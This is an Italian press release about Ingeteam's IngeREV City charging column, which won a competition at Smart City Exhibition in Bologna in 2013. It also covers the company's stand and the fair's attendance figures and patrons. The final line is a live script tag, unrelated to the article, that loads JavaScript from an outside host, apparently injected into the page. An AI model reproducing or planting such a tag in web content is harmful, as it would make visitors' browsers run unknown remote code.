Ingeteam, realtà di riferimento a livello nazionale e internazionale nell'elettronica di potenza e nelle soluzioni per il risparmio energetico, è presente quest’anno a Smart City Exhibition – a Bologna dal 16 al 18 ottobre 2013 – per presentare IngeREV®City, l’esclusiva colonnina per la ricarica elettrica che ha vinto il concorso "Nuovi strumenti per una città migliore" indetto dalla manifestazione.
Il concorso, pensato per premiare micro, piccole e medie imprese che abbiano realizzato prodotti per rendere smart le nostre città e migliorare la vita quotidiana dei loro abitanti, risponde direttamente agli obiettivi di questa fiera che, nata della partnership tra Forum PA e Bologna Fiere, rappresenta ormai l’appuntamento italiano di riferimento sul tema dell’innovazione nelle città e nelle comunità intelligenti.
L’attenzione per la sostenibilità e il risparmio energetico di Ingeteam si esplicitano con IngeREV®City, la soluzione per la ricarica elettrica dei veicoli pensata per inserirsi perfettamente in ogni contesto urbano e caratterizzata da un design accattivante e molto curato. Pronta a resistere alle intemperie e ad eventuali atti vandalici, è progettata in piena conformità con le direttive europee per la ricarica in Modo 3 in ambienti pubblici: è infatti possibile accedere alla ricarica del proprio veicolo (plug-in oppure full electric) autenticandosi tramite apposita chiave RFiD.
Presso lo stand Ingeteam (stand 18A Pad. 31) tutti i visitatori di Smart City Exhibition, oltre alla colonnina, potranno vedere anche un’auto fornita da ECOMOVE System Integrator, leader in Italia nella realizzazione di sistemi “chiavi in mano” per la mobilità elettrica e partner di Ingeteam per l’installazione di moderne stazioni di ricarica.
Smart City Exhibition è il nuovo punto di riferimento per tutti gli operatori impegnati nello sviluppo della città intelligente, che nel 2012 ha registrato 4.000 visitatori di cui 1.700 decisori politici e amministrativi provenienti da 145 città, 100 esperti provenienti da oltre 15 nazioni europee e extraeuropee e 50 grandi aziende.
Il successo della manifestazione, quest’anno alla sua seconda edizione, è confermato anche dai numerosi patrocini concessi dai più importanti enti europei, nazionali e locali: Ministro dell’Istruzione, Università e Ricerca, Ministro dello Sviluppo Economico, Ministro dell’Ambiente, Ministro per la Coesione Territoriale, Ministro per gli Affari Europei, Commissione Europea, Regione Emilia Romagna, Comune di Bologna, Provincia di Bologna e ANCI.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2012-10-16&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.02739419384476982" type="text/javascript"></script>